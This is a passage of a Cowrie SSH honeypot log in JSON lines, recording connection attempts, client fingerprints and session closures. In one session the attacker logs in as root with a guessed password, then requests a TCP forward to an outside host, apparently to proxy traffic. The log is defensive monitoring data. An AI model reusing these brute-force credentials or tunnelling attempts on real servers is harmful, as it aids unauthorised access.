084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T03:21:04.743657Z","src_ip":"116.196.70.63","session":"ba2c87b049f9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:21:12.368450Z","src_ip":"116.196.70.63","session":"ba2c87b049f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33452,"dst_ip":"1.2.3.4","dst_port":22,"session":"e78e3d0a22ef","protocol":"ssh","message":"New connection: 212.227.125.160:33452 (1.2.3.4:22) [session: e78e3d0a22ef]","sensor":"my-vps","timestamp":"2025-09-09T03:21:47.089205Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:21:47.134060Z","src_ip":"212.227.125.160","session":"e78e3d0a22ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6116,"dst_ip":"1.2.3.4","dst_port":22,"session":"23fd0ff62ad9","protocol":"ssh","message":"New connection: 212.227.235.229:6116 (1.2.3.4:22) [session: 23fd0ff62ad9]","sensor":"my-vps","timestamp":"2025-09-09T03:22:55.509908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T03:22:55.597343Z","src_ip":"212.227.235.229","session":"23fd0ff62ad9"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T03:22:55.687331Z","src_ip":"212.227.235.229","session":"23fd0ff62ad9"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T03:22:56.787548Z","src_ip":"212.227.235.229","session":"23fd0ff62ad9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:22:56.789029Z","src_ip":"212.227.235.229","session":"23fd0ff62ad9"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.166","src_port":52498,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f67e7915fa6","protocol":"ssh","message":"New connection: 203.195.82.166:52498 (1.2.3.4:22) [session: 7f67e7915fa6]","sensor":"my-vps","timestamp":"2025-09-09T03:25:23.876474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:25:23.877356Z","src_ip":"203.195.82.166","session":"7f67e7915fa6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T03:25:24.111738Z","src_ip":"203.195.82.166","session":"7f67e7915fa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":7892,"dst_ip":"1.2.3.4","dst_port":22,"session":"7179abd40381","protocol":"ssh","message":"New connection: 212.227.235.229:7892 (1.2.3.4:22) [session: 7179abd40381]","sensor":"my-vps","timestamp":"2025-09-09T03:25:25.437931Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:25:25.439022Z","src_ip":"212.227.235.229","session":"7179abd40381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8196,"dst_ip":"1.2.3.4","dst_port":22,"session":"adacdc5eabb2","protocol":"ssh","message":"New connection: 212.227.235.229:8196 (1.2.3.4:22) [session: adacdc5eabb2]","sensor":"my-vps","timestamp":"2025-09-09T03:25:25.621442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:25:25.622587Z","src_ip":"212.227.235.229","session":"adacdc5eabb2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T03:25:25.781120Z","src_ip":"212.227.235.229","session":"adacdc5eabb2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:25:26.259642Z","src_ip":"212.227.235.229","session":"adacdc5eabb2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T03:25:26.422712Z","session":"adacdc5eabb2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:25:31.876856Z","src_ip":"203.195.82.166","session":"7f67e7915fa6"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:26:35.623587Z","src_ip":"212.227.235.229","session":"adacdc5eabb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6116,"dst_ip":"1.2.3.4","dst_port":22,"session":"979b20e3bf57","protocol":"ssh","message":"New connection: 212.227.125.160:6116 (1.2.3.4:22) [session: 979b20e3bf57]","sensor":"my-vps","timestamp":"2025-09-09T03:26:51.520704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T03:26:51.569577Z","src_ip":"212.227.125.160","session":"979b20e3bf57"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T03:26:51.630053Z","src_ip":"212.227.125.160","session":"979b20e3bf57"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T03:26:52.525923Z","src_ip":"212.227.125.160","session":"979b20e3bf57"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:26:52.527492Z","src_ip":"212.227.125.160","session":"979b20e3bf57"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60112,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d327876ac0","protocol":"ssh","message":"New connection: 217.72.205.35:60112 (1.2.3.4:22) [session: e8d327876ac0]","sensor":"my-vps","timestamp":"2025-09-09T03:26:54.251352Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:26:54.252488Z","src_ip":"217.72.205.35","session":"e8d327876ac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36174,"dst_ip":"1.2.3.4","dst_port":22,"session":"537004ae4d92","protocol":"ssh","message":"New connection: 212.227.125.160:36174 (1.2.3.4:22) [session: 537004ae4d92]","sensor":"my-vps","timestamp":"2025-09-09T03:27:32.893385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:27:32.894428Z","src_ip":"212.227.125.160","session":"537004ae4d92"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T03:27:32.991896Z","src_ip":"212.227.125.160","session":"537004ae4d92"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:27:40.894947Z","src_ip":"212.227.125.160","session":"537004ae4d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53628,"dst_ip":"1.2.3.4","dst_port":22,"session":"9956284efbe6","protocol":"ssh","message":"New connection: 212.227.235.229:53628 (1.2.3.4:22) [session: 9956284efbe6]","sensor":"my-vps","timestamp":"2025-09-09T03:30:09.512722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:30:09.513604Z","src_ip":"212.227.235.229","session":"9956284efbe6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T03:30:09.666041Z","src_ip":"212.227.235.229","session":"9956284efbe6"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:30:17.512838Z","src_ip":"212.227.235.229","session":"9956284efbe6"}
{"eventid":"cowrie.session.connect","src_ip":"43.155.183.111","src_port":42134,"dst_ip":"1.2.3.4","dst_port":22,"session":"60f6c4e9b3af","protocol":"ssh","message":"New connection: 43.155.183.111:42134 (1.2.3.4:22) [session: 60f6c4e9b3af]","sensor":"my-vps","timestamp":"2025-09-09T03:30:39.837847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:30:39.838979Z","src_ip":"43.155.183.111","session":"60f6c4e9b3af"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T03:30:40.147778Z","src_ip":"43.155.183.111","session":"60f6c4e9b3af"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:30:47.839037Z","src_ip":"43.155.183.111","session":"60f6c4e9b3af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47744,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ed5d33e5061","protocol":"ssh","message":"New connection: 212.227.125.160:47744 (1.2.3.4:22) [session: 4ed5d33e5061]","sensor":"my-vps","timestamp":"2025-09-09T03:30:55.647737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:30:56.953790Z","src_ip":"212.227.125.160","session":"4ed5d33e5061"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""